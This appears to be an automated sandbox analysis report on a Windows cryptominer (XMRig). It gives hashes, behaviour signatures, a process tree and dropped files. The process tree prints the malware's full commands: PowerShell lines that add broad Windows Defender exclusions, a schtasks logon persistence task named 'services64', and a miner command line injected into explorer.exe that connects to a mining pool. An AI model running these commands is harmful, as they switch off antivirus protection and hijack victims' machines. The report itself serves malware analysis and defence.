Analysis

  • max time kernel
    106s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20-11-2024 22:13

General

  • Target

    ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe

  • Size

    2.1MB

  • MD5

    9bc40b0890e81c429b325727e5ba5893

  • SHA1

    a7561d62b00391fc996ee244bba8069ed3dd6bdb

  • SHA256

    ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344

  • SHA512

    f08fc59295e0eb348c0eec1e2670b773001be7797832df829fa42c8cbeebfb5e0e4195b8bfb962c6143ceac29e7720f753993b0b3689678ef913a0de0aec5d7f

  • SSDEEP

    49152:GvQUiuvKem70245BBqhM85yYESmScKCgwm8f63tk5LwjVg:GvQUhkz6HG5pESmSN9A4k9KVg

Score
10/10

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe
    "C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4108
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1376
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3428
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3244
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1196
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Users\Admin\AppData\Local\Temp\services64.exe
          C:\Users\Admin\AppData\Local\Temp\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4012
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2536
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4524
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4396
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:448
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:4500
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=80
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4732

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

      Filesize

      539B

      MD5

      b245679121623b152bea5562c173ba11

      SHA1

      47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

      SHA256

      73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

      SHA512

      75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      2979eabc783eaca50de7be23dd4eafcf

      SHA1

      d709ce5f3a06b7958a67e20870bfd95b83cad2ea

      SHA256

      006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

      SHA512

      92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      dd1d0b083fedf44b482a028fb70b96e8

      SHA1

      dc9c027937c9f6d52268a1504cbae42a39c8d36a

      SHA256

      cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

      SHA512

      96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      5fbb56518e82d1b1e5ef6be3b6693880

      SHA1

      4e7671d0193b6f640d81b3fb91ac17ca67e0632b

      SHA256

      760d5623e712e53485c80330b3e2567577ffcf9397a94c3085bd1999f4650a40

      SHA512

      ff2fff83f094820da4157c907be06039dcc58b1a23e867ba58c0c3f40d8bbd90022161dc3d77c082a765f7f4104f683be995b994183d1899c73bd9131fe614d1

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfmiwhls.3ak.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\services64.exe

      Filesize

      2.1MB

      MD5

      9bc40b0890e81c429b325727e5ba5893

      SHA1

      a7561d62b00391fc996ee244bba8069ed3dd6bdb

      SHA256

      ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344

      SHA512

      f08fc59295e0eb348c0eec1e2670b773001be7797832df829fa42c8cbeebfb5e0e4195b8bfb962c6143ceac29e7720f753993b0b3689678ef913a0de0aec5d7f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

      Filesize

      32KB

      MD5

      703bba1d6c5595dcd7cbc5e34ed2ae33

      SHA1

      4c4e251addaf23f55350a8f1227d239d12aba92e

      SHA256

      28f55ece940bf306a301835f5500498f5ef552d0f57ca988b01ee0b584128619

      SHA512

      3c94a83a1f77b04eb91fbad142b965ca5c3bf6073e67314272aece6cd347b53f340f26aad34ba80ba65b26e186539e0327e6acd429ab6540d3eeada70199863a

    • memory/1376-12-0x000001830D590000-0x000001830D5B2000-memory.dmp

      Filesize

      136KB

    • memory/1376-17-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/1376-18-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/1376-19-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/1376-22-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/2876-36-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/2876-3-0x000002004FDE0000-0x000002004FDF2000-memory.dmp

      Filesize

      72KB

    • memory/2876-35-0x00007FFD2EAD3000-0x00007FFD2EAD5000-memory.dmp

      Filesize

      8KB

    • memory/2876-0-0x000002004DD60000-0x000002004DF80000-memory.dmp

      Filesize

      2.1MB

    • memory/2876-41-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/2876-5-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/2876-4-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/2876-6-0x00007FFD2EAD0000-0x00007FFD2F591000-memory.dmp

      Filesize

      10.8MB

    • memory/2876-2-0x0000020068860000-0x0000020068A80000-memory.dmp

      Filesize

      2.1MB

    • memory/2876-1-0x00007FFD2EAD3000-0x00007FFD2EAD5000-memory.dmp

      Filesize

      8KB

    • memory/4396-87-0x0000023F5F370000-0x0000023F5F58C000-memory.dmp

      Filesize

      2.1MB

    • memory/4500-89-0x000002867F3E0000-0x000002867F3E6000-memory.dmp

      Filesize

      24KB

    • memory/4500-88-0x000002867EBC0000-0x000002867EBC6000-memory.dmp

      Filesize

      24KB

    • memory/4524-66-0x000002BCC2A80000-0x000002BCC2C9C000-memory.dmp

      Filesize

      2.1MB

    • memory/4732-79-0x0000000002720000-0x0000000002740000-memory.dmp

      Filesize

      128KB

    • memory/4732-82-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/4732-85-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/4732-83-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/4732-84-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/4732-81-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/4732-77-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/4732-78-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB